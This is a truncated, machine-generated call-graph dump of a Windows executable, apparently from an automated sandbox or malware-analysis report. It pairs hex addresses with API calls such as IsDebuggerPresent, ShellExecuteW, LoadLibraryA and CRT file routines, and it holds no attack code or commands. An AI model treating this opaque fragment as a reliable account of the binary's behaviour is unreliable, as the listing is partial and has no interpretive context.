API calls _free 86495->86585 86498 417c87 TlsAlloc 86496->86498 86501 417cd5 TlsSetValue 86498->86501 86502 417d96 86498->86502 86500 417c39 86500->86464 86501->86502 86503 417ce6 __init_pointers 86501->86503 86502->86464 86586 418151 InitializeCriticalSectionAndSpinCount 86503->86586 86505 417d91 86594 4178ff 49 API calls _free 86505->86594 86507 417d2a 86507->86505 86587 416b49 86507->86587 86510 417d76 86593 41793c 46 API calls 4 library calls 86510->86593 86512 417d7e GetCurrentThreadId 86512->86502 86514 416b49 __calloc_crt 46 API calls 86513->86514 86523 41aabf 86514->86523 86515 41ac6a GetStdHandle 86520 41ac34 86515->86520 86516 416b49 __calloc_crt 46 API calls 86516->86523 86517 41acce SetHandleCount 86525 4164f7 86517->86525 86518 41ac7c GetFileType 86518->86520 86519 41abb4 86519->86520 86521 41abe0 GetFileType 86519->86521 86522 41abeb InitializeCriticalSectionAndSpinCount 86519->86522 86520->86515 86520->86517 86520->86518 86524 41aca2 InitializeCriticalSectionAndSpinCount 86520->86524 86521->86519 86521->86522 86522->86519 86522->86525 86523->86516 86523->86519 86523->86520 86523->86525 86524->86520 86524->86525 86525->86469 86579 411924 46 API calls 3 library calls 86525->86579 86527 41f595 86526->86527 86528 41f599 86526->86528 86527->86473 86604 416b04 86528->86604 86530 41f5bb _memmove 86531 41f5c2 FreeEnvironmentStringsW 86530->86531 86531->86473 86533 41f50b _wparse_cmdline 86532->86533 86534 416b04 __malloc_crt 46 API calls 86533->86534 86535 41f54e _wparse_cmdline 86533->86535 86534->86535 86535->86475 86537 41f2bc _wcslen 86536->86537 86541 41f2b4 86536->86541 86538 416b49 __calloc_crt 46 API calls 86537->86538 86543 41f2e0 _wcslen 86538->86543 86539 41f336 86611 413748 86539->86611 86541->86479 86542 416b49 __calloc_crt 46 API calls 86542->86543 86543->86539 86543->86541 86543->86542 86544 41f35c 86543->86544 86547 41f373 86543->86547 86610 41ef12 46 API calls __mbstowcs_l_helper 86543->86610 86546 413748 _free 46 API calls 86544->86546 86546->86541 86617 417ed3 86547->86617 86549 41f37f 86549->86479 86551 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 86550->86551 86553 411750 __IsNonwritableInCurrentImage 86551->86553 86636 41130a 51 API calls __cinit 86551->86636 86553->86483 86555 42e2f3 86554->86555 86556 40d6cc 86554->86556 86637 408f40 86556->86637 86558 40d707 86641 40ebb0 86558->86641 86561 40d737 86644 411951 86561->86644 86566 40d751 86656 40f4e0 SystemParametersInfoW SystemParametersInfoW 86566->86656 86568 40d75f 86657 40d590 GetCurrentDirectoryW 86568->86657 86570 40d767 SystemParametersInfoW 86571 40d794 86570->86571 86572 40d78d FreeLibrary 86570->86572 86573 408f40 VariantClear 86571->86573 86572->86571 86574 40d79d 86573->86574 86575 408f40 VariantClear 86574->86575 86576 40d7a6 86575->86576 86576->86488 86583 4118da 46 API calls _doexit 86576->86583 86577->86461 86578->86465 86583->86488 86584->86491 86585->86500 86586->86507 86589 416b52 86587->86589 86590 416b8f 86589->86590 86591 416b70 Sleep 86589->86591 86595 41f677 86589->86595 86590->86505 86590->86510 86592 416b85 86591->86592 86592->86589 86592->86590 86593->86512 86594->86502 86596 41f683 86595->86596 86602 41f69e _malloc 86595->86602 86597 41f68f 86596->86597 86596->86602 86603 417f77 46 API calls __getptd_noexit 86597->86603 86599 41f6b1 RtlAllocateHeap 86601 41f6d8 86599->86601 86599->86602 86600 41f694 86600->86589 86601->86589 86602->86599 86602->86601 86603->86600 86607 416b0d 86604->86607 86605 4135bb _malloc 45 API calls 86605->86607 86606 416b43 86606->86530 86607->86605 86607->86606 86608 416b24 Sleep 86607->86608 86609 416b39 86608->86609 86609->86606 86609->86607 86610->86543 86612 41377c _free 86611->86612 86613 413753 RtlFreeHeap 86611->86613 86612->86541 86613->86612 86614 413768 86613->86614 86620 417f77 46 API calls __getptd_noexit 86614->86620 86616 41376e GetLastError 86616->86612 86621 417daa 86617->86621 86620->86616 86622 417dc9 setSBCS __call_reportfault 86621->86622 86623 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 86622->86623 86626 417eb5 __call_reportfault 86623->86626 86625 417ed1 GetCurrentProcess TerminateProcess 86625->86549 86627 41a208 86626->86627 86628 41a210 86627->86628 86629 41a212 IsDebuggerPresent 86627->86629 86628->86625 86635 41fe19 86629->86635 86632 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 86633 421ff0 __call_reportfault 86632->86633 86634 421ff8 GetCurrentProcess TerminateProcess 86632->86634 86633->86634 86634->86625 86635->86632 86636->86553 86638 408f48 ctype 86637->86638 86639 4265c7 VariantClear 86638->86639 86640 408f55 ctype 86638->86640 86639->86640 86640->86558 86697 40ebd0 86641->86697 86701 4182cb 86644->86701 86646 41195e 86708 4181f2 RtlLeaveCriticalSection 86646->86708 86648 40d748 86649 4119b0 86648->86649 86650 4119d6 86649->86650 86651 4119bc 86649->86651 86650->86566 86651->86650 86743 417f77 46 API calls __getptd_noexit 86651->86743 86653 4119c6 86744 417f25 10 API calls __mbstowcs_l_helper 86653->86744 86655 4119d1 86655->86566 86656->86568 86745 401f20 86657->86745 86659 40d5b6 IsDebuggerPresent 86660 40d5c4 86659->86660 86661 42e1bb MessageBoxA 86659->86661 86662 42e1d4 86660->86662 86663 40d5e3 86660->86663 86661->86662 86915 403a50 52 API calls 3 library calls 86662->86915 86815 40f520 86663->86815 86667 40d5fd GetFullPathNameW 86827 401460 86667->86827 86669 40d63b 86670 40d643 86669->86670 86671 42e231 SetCurrentDirectoryW 86669->86671 86672 40d64c 86670->86672 86916 432fee 6 API calls 86670->86916 86671->86670 86842 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 86672->86842 86675 42e252 86675->86672 86677 42e25a GetModuleFileNameW 86675->86677 86679 42e274 86677->86679 86680 42e2cb GetForegroundWindow ShellExecuteW 86677->86680 86917 401b10 86679->86917 86682 40d688 86680->86682 86681 40d656 86684 40d669 86681->86684 86687 40e0c0 74 API calls 86681->86687 86689 40d692 SetCurrentDirectoryW 86682->86689 86850 4091e0 86684->86850 86687->86684 86689->86570 86691 42e28d 86924 40d200 52 API calls 2 library calls 86691->86924 86694 42e299 GetForegroundWindow ShellExecuteW 86695 42e2c6 86694->86695 86695->86682 86696 40ec00 LoadLibraryA GetProcAddress 86696->86561 86698 40d72e 86697->86698 86699 40ebd6 LoadLibraryA 86697->86699 86698->86561 86698->86696 86699->86698 86700 40ebe7 GetProcAddress 86699->86700 86700->86698 86702 4182e0 86701->86702 86703 4182f3 RtlEnterCriticalSection 86701->86703 86709 418209 86702->86709 86703->86646 86705 4182e6 86705->86703 86736 411924 46 API calls 3 library calls 86705->86736 86708->86648 86710 418215 _raise 86709->86710 86711 418225 86710->86711 86712 41823d 86710->86712 86737 418901 46 API calls __NMSG_WRITE 86711->86737 86715 416b04 __malloc_crt 45 API calls 86712->86715 86718 41824b _raise 86712->86718 86714 41822a 86738 418752 46 API calls 6 library calls 86714->86738 86717 418256 86715->86717 86720 41825d 86717->86720 86721 41826c 86717->86721 86718->86705 86719 418231 86739 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86719->86739 86740 417f77 46 API calls __getptd_noexit 86720->86740 86722 4182cb __lock 45 API calls 86721->86722 86725 418273 86722->86725 86727 4182a6 86725->86727 86728 41827b InitializeCriticalSectionAndSpinCount 86725->86728 86731 413748 _free 45 API calls 86727->86731 86729 418297 86728->86729 86730 41828b 86728->86730 86742 4182c2 RtlLeaveCriticalSection _doexit 86729->86742 86732 413748 _free 45 API calls 86730->86732 86731->86729 86733 418291 86732->86733 86741 417f77 46 API calls __getptd_noexit 86733->86741 86737->86714 86738->86719 86740->86718 86741->86729 86742->86718 86743->86653 86744->86655 86925 40e6e0 86745->86925 86749 401f41 GetModuleFileNameW 86943 410100 86749->86943 86751 401f5c 86955 410960 86751->86955 86754 401b10 52 API calls 86755 401f81 86754->86755 86958 401980 86755->86958 86757 401f8e 86758 408f40 VariantClear 86757->86758 86759 401f9d 86758->86759 86760 401b10 52 API calls 86759->86760 86761 401fb4 86760->86761 86762 401980 53 API calls 86761->86762 86763 401fc3 86762->86763 86764 401b10 52 API calls 86763->86764 86765 401fd2 86764->86765 86966 40c2c0 86765->86966 86767 401fe1 86768 40bc70 52 API calls 86767->86768 86769 401ff3 86768->86769 86984 401a10 86769->86984 86771 401ffe 86991 4114ab 86771->86991 86774 428b05 86776 401a10 52 API calls 86774->86776 86775 402017 86777 4114ab __wcsicoll 58 API calls 86775->86777 86778 428b18 86776->86778 86779 402022 86777->86779 86781 401a10 52 API calls 86778->86781 86779->86778 86780 40202d 86779->86780 86782 4114ab __wcsicoll 58 API calls 86780->86782 86783 428b33 86781->86783 86784 402038 86782->86784 86786 428b3b GetModuleFileNameW 86783->86786 86785 402043 86784->86785 86784->86786 86787 4114ab __wcsicoll 58 API calls 86785->86787 86788 401a10 52 API calls 86786->86788 86789 40204e 86787->86789 86790 428b6c 86788->86790 86792 428b90 _wcscpy 86789->86792 86795 401a10 52 API calls 86789->86795 86806 402092 86789->86806 86791 40e0a0 52 API calls 86790->86791 86793 428b7a 86791->86793 86801 401a10 52 API calls 86792->86801 86796 401a10 52 API calls 86793->86796 86794 4020a3 86797 428bc6 86794->86797 86999 40e830 53 API calls 86794->86999 86800 402073 _wcscpy 86795->86800 86798 428b88 86796->86798 86798->86792 86804 401a10 52 API calls 86800->86804 86810 4020d0 86801->86810 86802 4020bb 87000 40cf00 53 API calls 86802->87000 86804->86806 86805 4020c6 86807 408f40 VariantClear 86805->86807 86806->86792 86806->86794 86807->86810 86808 402110 86812 408f40 VariantClear 86808->86812 86810->86808 86813 401a10 52 API calls 86810->86813 87001 40cf00 53 API calls 86810->87001 87002 40e6a0 53 API calls 86810->87002 86814 402120 ctype 86812->86814 86813->86810 86814->86659 86816 4295c9 setSBCS 86815->86816 86817 40f53c 86815->86817 86819 4295d9 758ED0D0 86816->86819 87682 410120 86817->87682 86819->86817 86821 40d5f5 86819->86821 86820 40f545 87686 4102b0 SHGetMalloc 86820->87686 86821->86667 86821->86669 86823 40f54c 87691 410190 GetFullPathNameW 86823->87691 86825 40f559 87702 40f570 86825->87702 87758 402400 86827->87758 86829 40146f 86832 428c29 _wcscat 86829->86832 87767 401500 86829->87767 86831 40147c 86831->86832 87775 40d440 86831->87775 86834 401489 86834->86832 86835 401491 GetFullPathNameW 86834->86835 86836 402160 52 API calls 86835->86836 86837 4014bb 86836->86837 86838 402160 52 API calls 86837->86838 86839 4014c8 86838->86839 86839->86832 86840 402160 52 API calls 86839->86840 86841 4014ee 86840->86841 86841->86669 86843 428361 86842->86843 86844 4103fc LoadImageW RegisterClassExW 86842->86844 87795 44395e EnumResourceNamesW LoadImageW 86843->87795 87794 410490 7 API calls 86844->87794 86847 428368 86848 40d651 86849 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 86848->86849 86849->86681 86851 409202 86850->86851 86852 42d7ad 86850->86852 86908 409216 ctype 86851->86908 88067 410940 330 API calls 86851->88067 88070 45e737 90 API calls 3 library calls 86852->88070 86855 409386 86856 40939c 86855->86856 88068 40f190 10 API calls 86855->88068 86856->86682 86914 401000 Shell_NotifyIconW setSBCS 86856->86914 86858 4095b2 86858->86856 88069 401a50 330 API calls 86858->88069 86859 409253 PeekMessageW 86859->86908 86861 42d8cd Sleep 86861->86908 86862 4095c6 LockWindowUpdate 74285CF0 GetMessageW 86862->86856 86865 4095f9 86862->86865 86864 42e13b 88088 40d410 VariantClear 86864->88088 86868 42e158 TranslateMessage DispatchMessageW GetMessageW 86865->86868 86868->86856 86868->86868 86870 409567 PeekMessageW 86870->86908 86872 44c29d 52 API calls 86913 4094e0 86872->86913 86873 46f3c1 107 API calls 86873->86908 86874 40e0a0 52 API calls 86874->86908 86875 46fdbf 108 API calls 86875->86913 86876 42dcd2 WaitForSingleObject 86881 42dcf0 GetExitCodeProcess CloseHandle 86876->86881 86876->86908 86877 409551 TranslateMessage DispatchMessageW 86877->86870 86879 42dd3d Sleep 86879->86913 86880 47d33e 308 API calls 86880->86908 88077 40d410 VariantClear 86881->88077 86885 4094cf Sleep 86885->86913 86886 42d94d timeGetTime 88073 465124 53 API calls 86886->88073 86888 40d410 VariantClear 86888->86908 86889 408f40 VariantClear 86889->86913 86892 40c620 timeGetTime 86892->86913 86893 465124 53 API calls 86893->86913 86895 42dd89 CloseHandle 86895->86913 86897 42de19 GetExitCodeProcess CloseHandle 86897->86913 86898 401b10 52 API calls 86898->86913 86901 42de88 Sleep 86901->86908 86904 401980 53 API calls 86904->86913 86905 45e737 90 API calls 86905->86908 86908->86855 86908->86859 86908->86861 86908->86864 86908->86870 86908->86873 86908->86874 86908->86876 86908->86877 86908->86879 86908->86880 86908->86885 86908->86886 86908->86888 86908->86905 86909 42e0cc VariantClear 86908->86909 86910 408f40 VariantClear 86908->86910 86908->86913 87796 4091b0 86908->87796 87854 40afa0 86908->87854 87880 408fc0 86908->87880 87915 408cc0 86908->87915 87929 40d150 86908->87929 87934 40d170 86908->87934 87940 4096a0 86908->87940 88071 465124 53 API calls 86908->88071 88072 40c620 timeGetTime 86908->88072 88087 40e270 VariantClear ctype 86908->88087 86909->86908 86910->86908 86913->86872 86913->86875 86913->86889 86913->86892 86913->86893 86913->86895 86913->86897 86913->86898 86913->86901 86913->86904 86913->86908 88074 45178a 54 API calls 86913->88074 88075 47d33e 330 API calls 86913->88075 88076 453bc6 54 API calls 86913->88076 88078 40d410 VariantClear 86913->88078 88079 443d19 67 API calls _wcslen 86913->88079 88080 4574b4 VariantClear 86913->88080 88081 403cd0 86913->88081 88085 4731e1 VariantClear 86913->88085 88086 4331a2 6 API calls 86913->88086 86914->86682 86915->86669 86916->86675 86918 401b16 _wcslen 86917->86918 86919 4115d7 52 API calls 86918->86919 86920 401b63 86918->86920 86921 401b4b _memmove 86919->86921 86923 40d200 52 API calls 2 library calls 86920->86923 86922 4115d7 52 API calls 86921->86922 86922->86920 86923->86691 86924->86694 86926 40bc70 52 API calls 86925->86926 86927 401f31 86926->86927 86928 402560 86927->86928 86929 40256d __write_nolock 86928->86929 86930 402160 52 API calls 86929->86930 86932 402593 86930->86932 86942 4025bd 86932->86942 87003 401c90 86932->87003 86933 4026f0 52 API calls 86933->86942 86934 4026a7 86935 401b10 52 API calls 86934->86935 86940 4026db 86934->86940 86937 4026d1 86935->86937 86936 401b10 52 API calls 86936->86942 87007 40d7c0 52 API calls 2 library calls 86937->87007 86938 401c90 52 API calls 86938->86942 86940->86749 86942->86933 86942->86934 86942->86936 86942->86938 87006 40d7c0 52 API calls 2 library calls 86942->87006 87008 40f760 86943->87008 86946 410118 86946->86751 86948 42805d 86949 42806a 86948->86949 87064 431e58 86948->87064 86951 413748 _free 46 API calls 86949->86951 86952 428078 86951->86952 86953 431e58 82 API calls 86952->86953 86954 428084 86953->86954 86954->86751 86956 4115d7 52 API calls 86955->86956 86957 401f74 86956->86957 86957->86754 86959 4019a3 86958->86959 86960 401985 86958->86960 86959->86960 86961 4019b8 86959->86961 86963 40199f 86960->86963 87670 403e10 53 API calls 86960->87670 87671 403e10 53 API calls 86961->87671 86963->86757 86965 4019c4 86965->86757 86967 40c2c7 86966->86967 86968 40c30e 86966->86968 86969 40c2d3 86967->86969 86970 426c79 86967->86970 86971 40c315 86968->86971 86972 426c2b 86968->86972 87672 403ea0 52 API calls __cinit 86969->87672 87677 4534e3 52 API calls 86970->87677 86976 40c321 86971->86976 86977 426c5a 86971->86977 86974 426c4b 86972->86974 86975 426c2e 86972->86975 87675 4534e3 52 API calls 86974->87675 86983 40c2de 86975->86983 87674 4534e3 52 API calls 86975->87674 87673 403ea0 52 API calls __cinit 86976->87673 87676 4534e3 52 API calls 86977->87676 86983->86767 86983->86983 86985 401a30 86984->86985 86986 401a17 86984->86986 86987 402160 52 API calls 86985->86987 86988 401a2d 86986->86988 87678 403c30 52 API calls _memmove 86986->87678 86990 401a3d 86987->86990 86988->86771 86990->86771 86992 411523 86991->86992 86993 4114ba 86991->86993 87681 4113a8 58 API calls 3 library calls 86992->87681 86995 40200c 86993->86995 87679 417f77 46 API calls __getptd_noexit 86993->87679 86995->86774 86995->86775 86997 4114c6 87680 417f25 10 API calls __mbstowcs_l_helper 86997->87680 86999->86802 87000->86805 87001->86810 87002->86810 87004 4026f0 52 API calls 87003->87004 87005 401c97 87004->87005 87005->86932 87006->86942 87007->86940 87068 40f6f0 87008->87068 87010 40f77b _strcat ctype 87076 40f850 87010->87076 87015 427c2a 87106 414d04 87015->87106 87017 40f7fc 87017->87015 87018 40f804 87017->87018 87093 414a46 87018->87093 87022 40f80e 87022->86946 87027 4528bd 87022->87027 87024 427c59 87112 414fe2 87024->87112 87026 427c79 87028 4150d1 _fseek 81 API calls 87027->87028 87029 452930 87028->87029 87612 452719 87029->87612 87032 452948 87032->86948 87033 414d04 __fread_nolock 61 API calls 87034 452966 87033->87034 87035 414d04 __fread_nolock 61 API calls 87034->87035 87036 452976 87035->87036 87037 414d04 __fread_nolock 61 API calls 87036->87037 87038 45298f 87037->87038 87039 414d04 __fread_nolock 61 API calls 87038->87039 87040 4529aa 87039->87040 87041 4150d1 _fseek 81 API calls 87040->87041 87042 4529c4 87041->87042 87043 4135bb _malloc 46 API calls 87042->87043 87044 4529cf 87043->87044 87045 4135bb _malloc 46 API calls 87044->87045 87046 4529db 87045->87046 87047 414d04 __fread_nolock 61 API calls 87046->87047 87048 4529ec 87047->87048 87049 44afef GetSystemTimeAsFileTime 87048->87049 87050 452a00 87049->87050 87051 452a36 87050->87051 87052 452a13 87050->87052 87053 452aa5 87051->87053 87054 452a3c 87051->87054 87055 413748 _free 46 API calls 87052->87055 87058 413748 _free 46 API calls 87053->87058 87618 44b1a9 87054->87618 87056 452a1c 87055->87056 87059 413748 _free 46 API calls 87056->87059 87061 452aa3 87058->87061 87062 452a25 87059->87062 87060 452a9d 87063 413748 _free 46 API calls 87060->87063 87061->86948 87062->86948 87063->87061 87065 431e64 87064->87065 87066 431e6a 87064->87066 87067 414a46 __fcloseall 82 API calls 87065->87067 87066->86949 87067->87066 87069 425de2 87068->87069 87070 40f6fc _wcslen 87068->87070 87069->87010 87071 40f710 WideCharToMultiByte 87070->87071 87072 40f756 87071->87072 87073 40f728 87071->87073 87072->87010 87074 4115d7 52 API calls 87073->87074 87075 40f735 WideCharToMultiByte 87074->87075 87075->87010 87078 40f85d setSBCS _strlen 87076->87078 87077 426b3b 87078->87077 87080 40f7ab 87078->87080 87125 414db8 87078->87125 87081 4149c2 87080->87081 87140 414904 87081->87140 87083 40f7e9 87083->87015 87084 40f5c0 87083->87084 87087 40f5cd _strcat __write_nolock _memmove 87084->87087 87085 414d04 __fread_nolock 61 API calls 87085->87087 87086 40f691 __tzset_nolock 87086->87017 87087->87085 87087->87086 87092 425d11 87087->87092 87228 4150d1 87087->87228 87089 4150d1 _fseek 81 API calls 87090 425d33 87089->87090 87091 414d04 __fread_nolock 61 API calls 87090->87091 87091->87086 87092->87089 87094 414a52 _raise 87093->87094 87095 414a64 87094->87095 87096 414a79 87094->87096 87368 417f77 46 API calls __getptd_noexit 87095->87368 87098 415471 __lock_file 47 API calls 87096->87098 87102 414a74 _raise 87096->87102 87100 414a92 87098->87100 87099 414a69 87369 417f25 10 API calls __mbstowcs_l_helper 87099->87369 87352 4149d9 87100->87352 87102->87022 87437 414c76 87106->87437 87108 414d1c 87109 44afef 87108->87109 87605 442c5a 87109->87605 87111 44b00d 87111->87024 87113 414fee _raise 87112->87113 87114 414ffa 87113->87114 87115 41500f 87113->87115 87609 417f77 46 API calls __getptd_noexit 87114->87609 87117 415471 __lock_file 47 API calls 87115->87117 87119 415017 87117->87119 87118 414fff 87610 417f25 10 API calls __mbstowcs_l_helper 87118->87610 87121 414e4e __ftell_nolock 51 API calls 87119->87121 87123 415024 87121->87123 87122 41500a _raise 87122->87026 87611 41503d RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 87123->87611 87126 414dd6 87125->87126 87127 414deb 87125->87127 87136 417f77 46 API calls __getptd_noexit 87126->87136 87127->87126 87128 414df2 87127->87128 87138 41b91b 79 API calls 10 library calls 87128->87138 87130 414ddb 87137 417f25 10 API calls __mbstowcs_l_helper 87130->87137 87133 414e18 87134 414de6 87133->87134 87139 418f98 77 API calls 6 library calls 87133->87139 87134->87078 87136->87130 87137->87134 87138->87133 87139->87134 87141 414910 _raise 87140->87141 87142 414923 87141->87142 87145 414951 87141->87145 87196 417f77 46 API calls __getptd_noexit 87142->87196 87144 414928 87197 417f25 10 API calls __mbstowcs_l_helper 87144->87197 87159 41d4d1 87145->87159 87148 414956 87149 41496a 87148->87149 87150 41495d 87148->87150 87152 414992 87149->87152 87153 414972 87149->87153 87198 417f77 46 API calls __getptd_noexit 87150->87198 87176 41d218 87152->87176 87199 417f77 46 API calls __getptd_noexit 87153->87199 87156 414933 _raise @_EH4_CallFilterFunc@8 87156->87083 87160 41d4dd _raise 87159->87160 87161 4182cb __lock 46 API calls 87160->87161 87162 41d4eb 87161->87162 87163 41d567 87162->87163 87170 418209 __mtinitlocknum 46 API calls 87162->87170 87174 41d560 87162->87174 87204 4154b2 47 API calls __lock 87162->87204 87205 415520 RtlLeaveCriticalSection RtlLeaveCriticalSection _doexit 87162->87205 87165 416b04 __malloc_crt 46 API calls 87163->87165 87166 41d56e 87165->87166 87167 41d57c InitializeCriticalSectionAndSpinCount 87166->87167 87166->87174 87168 41d59c 87167->87168 87169 41d5af RtlEnterCriticalSection 87167->87169 87173 413748 _free 46 API calls 87168->87173 87169->87174 87170->87162 87172 41d5f0 _raise 87172->87148 87173->87174 87201 41d5fb 87174->87201 87177 41d23a 87176->87177 87178 41d255 87177->87178 87189 41d26c __wopenfile 87177->87189 87210 417f77 46 API calls __getptd_noexit 87178->87210 87180 41d25a 87211 417f25 10 API calls __mbstowcs_l_helper 87180->87211 87181 41d47a 87215 417f77 46 API calls __getptd_noexit 87181->87215 87182 41d48c 87207 422bf9 87182->87207 87186 41d47f 87216 417f25 10 API calls __mbstowcs_l_helper 87186->87216 87187 41499d 87200 4149b8 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 87187->87200 87189->87181 87195 41d421 87189->87195 87212 41341f 58 API calls 2 library calls 87189->87212 87191 41d41a 87191->87195 87213 41341f 58 API calls 2 library calls 87191->87213 87193 41d439 87193->87195 87214 41341f 58 API calls 2 library calls 87193->87214 87195->87181 87195->87182 87196->87144 87197->87156 87198->87156 87199->87156 87200->87156 87206 4181f2 RtlLeaveCriticalSection 87201->87206 87203 41d602 87203->87172 87204->87162 87205->87162 87206->87203 87217 422b35 87207->87217 87209 422c14 87209->87187 87210->87180 87211->87187 87212->87191 87213->87193 87214->87195 87215->87186 87216->87187 87220 422b41 _raise 87217->87220 87218 422b54 87219 417f77 __mbstowcs_l_helper 46 API calls 87218->87219 87221 422b59 87219->87221 87220->87218 87222 422b8a 87220->87222 87223 417f25 __mbstowcs_l_helper 10 API calls 87221->87223 87224 422400 __tsopen_nolock 109 API calls 87222->87224 87227 422b63 _raise 87223->87227 87225 422ba4 87224->87225 87226 422bcb __wsopen_helper RtlLeaveCriticalSection 87225->87226 87226->87227 87227->87209 87229 4150dd _raise 87228->87229 87230 4150e9 87229->87230 87232 41510f 87229->87232 87259 417f77 46 API calls __getptd_noexit 87230->87259 87241 415471 87232->87241 87233 4150ee 87260 417f25 10 API calls __mbstowcs_l_helper 87233->87260 87240 4150f9 _raise 87240->87087 87242 415483 87241->87242 87243 4154a5 RtlEnterCriticalSection 87241->87243 87242->87243 87244 41548b 87242->87244 87246 415117 87243->87246 87245 4182cb __lock 46 API calls 87244->87245 87245->87246 87247 415047 87246->87247 87248 415067 87247->87248 87249 415057 87247->87249 87254 415079 87248->87254 87262 414e4e 87248->87262 87317 417f77 46 API calls __getptd_noexit 87249->87317 87253 41505c 87261 415143 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 87253->87261 87279 41443c 87254->87279 87257 4150b9 87292 41e1f4 87257->87292 87259->87233 87260->87240 87261->87240 87263 414e61 87262->87263 87264 414e79 87262->87264 87318 417f77 46 API calls __getptd_noexit 87263->87318 87266 414139 _fprintf 46 API calls 87264->87266 87268 414e80 87266->87268 87267 414e66 87319 417f25 10 API calls __mbstowcs_l_helper 87267->87319 87270 41e1f4 __write 51 API calls 87268->87270 87272 414e97 87270->87272 87271 414e71 87271->87254 87272->87271 87273 414f09 87272->87273 87275 414ec9 87272->87275 87320 417f77 46 API calls __getptd_noexit 87273->87320 87275->87271 87276 41e1f4 __write 51 API calls 87275->87276 87277 414f64 87276->87277 87277->87271 87278 41e1f4 __write 51 API calls 87277->87278 87278->87271 87280 414455 87279->87280 87284 414477 87279->87284 87281 414139 _fprintf 46 API calls 87280->87281 87280->87284 87282 414470 87281->87282 87321 41b7b2 77 API calls 6 library calls 87282->87321 87285 414139 87284->87285 87286 414145 87285->87286 87287 41415a 87285->87287 87322 417f77 46 API calls __getptd_noexit 87286->87322 87287->87257 87289 41414a 87323 417f25 10 API calls __mbstowcs_l_helper 87289->87323 87291 414155 87291->87257 87293 41e200 _raise 87292->87293 87294 41e208 87293->87294 87296 41e223 87293->87296 87344 417f8a 46 API calls __getptd_noexit 87294->87344 87297 41e22f 87296->87297 87300 41e269 87296->87300 87346 417f8a 46 API calls __getptd_noexit 87297->87346 87298 41e20d 87345 417f77 46 API calls __getptd_noexit 87298->87345 87324 41ae56 87300->87324 87302 41e234 87347 417f77 46 API calls __getptd_noexit 87302->87347 87305 41e23c 87348 417f25 10 API calls __mbstowcs_l_helper 87305->87348 87306 41e26f 87308 41e291 87306->87308 87309 41e27d 87306->87309 87349 417f77 46 API calls __getptd_noexit 87308->87349 87334 41e17f 87309->87334 87310 41e215 _raise 87310->87253 87313 41e289 87351 41e2c0 RtlLeaveCriticalSection __unlock_fhandle 87313->87351 87314 41e296 87350 417f8a 46 API calls __getptd_noexit 87314->87350 87317->87253 87318->87267 87319->87271 87320->87271 87321->87284 87322->87289 87323->87291 87325 41ae62 _raise 87324->87325 87326 41aebc 87325->87326 87329 4182cb __lock 46 API calls 87325->87329 87327 41aec1 RtlEnterCriticalSection 87326->87327 87328 41aede _raise 87326->87328 87327->87328 87328->87306 87330 41ae8e 87329->87330 87331 41ae97 InitializeCriticalSectionAndSpinCount 87330->87331 87332 41aeaa 87330->87332 87331->87332 87333 41aeec ___lock_fhandle RtlLeaveCriticalSection 87332->87333 87333->87326 87335 41aded __lseeki64_nolock 46 API calls 87334->87335 87336 41e18e 87335->87336 87337 41e1a4 SetFilePointer 87336->87337 87338 41e194 87336->87338 87340 41e1c3 87337->87340 87341 41e1bb GetLastError 87337->87341 87339 417f77 __mbstowcs_l_helper 46 API calls 87338->87339 87342 41e199 87339->87342 87340->87342 87343 417f9d __dosmaperr 46 API calls 87340->87343 87341->87340 87342->87313 87343->87342 87344->87298 87345->87310 87346->87302 87347->87305 87348->87310 87349->87314 87350->87313 87351->87310 87353 4149ea 87352->87353 87354 4149fe 87352->87354 87398 417f77 46 API calls __getptd_noexit 87353->87398 87355 4149fa 87354->87355 87357 41443c __flush 77 API calls 87354->87357 87370 414ab2 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 87355->87370 87359 414a0a 87357->87359 87358 4149ef 87399 417f25 10 API calls __mbstowcs_l_helper 87358->87399 87371 41d8c2 87359->87371 87363 414139 _fprintf 46 API calls 87364 414a18 87363->87364 87375 41d7fe 87364->87375 87366 414a1e 87366->87355 87367 413748 _free 46 API calls 87366->87367 87367->87355 87368->87099 87369->87102 87370->87102 87372 414a12 87371->87372 87373 41d8d2 87371->87373 87372->87363 87373->87372 87374 413748 _free 46 API calls 87373->87374 87374->87372 87376 41d80a _raise 87375->87376 87377 41d812 87376->87377 87379 41d82d 87376->87379 87415 417f8a 46 API calls __getptd_noexit 87377->87415 87380 41d839 87379->87380 87383 41d873 87379->87383 87417 417f8a 46 API calls __getptd_noexit 87380->87417 87381 41d817 87416 417f77 46 API calls __getptd_noexit 87381->87416 87387 41ae56 ___lock_fhandle 48 API calls 87383->87387 87385 41d83e 87418 417f77 46 API calls __getptd_noexit 87385->87418 87389 41d879 87387->87389 87388 41d846 87419 417f25 10 API calls __mbstowcs_l_helper 87388->87419 87391 41d893 87389->87391 87392 41d887 87389->87392 87420 417f77 46 API calls __getptd_noexit 87391->87420 87400 41d762 87392->87400 87393 41d81f _raise 87393->87366 87396 41d88d 87421 41d8ba RtlLeaveCriticalSection __unlock_fhandle 87396->87421 87398->87358 87399->87355 87422 41aded 87400->87422 87402 41d7c8 87435 41ad67 47 API calls 2 library calls 87402->87435 87404 41d772 87404->87402 87405 41d7a6 87404->87405 87408 41aded __lseeki64_nolock 46 API calls 87404->87408 87405->87402 87406 41aded __lseeki64_nolock 46 API calls 87405->87406 87409 41d7b2 CloseHandle 87406->87409 87407 41d7d0 87414 41d7f2 87407->87414 87436 417f9d 46 API calls 3 library calls 87407->87436 87410 41d79d 87408->87410 87409->87402 87412 41d7be GetLastError 87409->87412 87411 41aded __lseeki64_nolock 46 API calls 87410->87411 87411->87405 87412->87402 87414->87396 87415->87381 87416->87393 87417->87385 87418->87388 87419->87393 87420->87396 87421->87393 87423 41ae12 87422->87423 87424 41adfa 87422->87424 87426 417f8a __close 46 API calls 87423->87426 87429 41ae51 87423->87429 87425 417f8a __close 46 API calls 87424->87425 87427 41adff 87425->87427 87428 41ae23 87426->87428 87430 417f77 __mbstowcs_l_helper 46 API calls 87427->87430 87431 417f77 __mbstowcs_l_helper 46 API calls 87428->87431 87429->87404 87434 41ae07 87430->87434 87432 41ae2b 87431->87432 87433 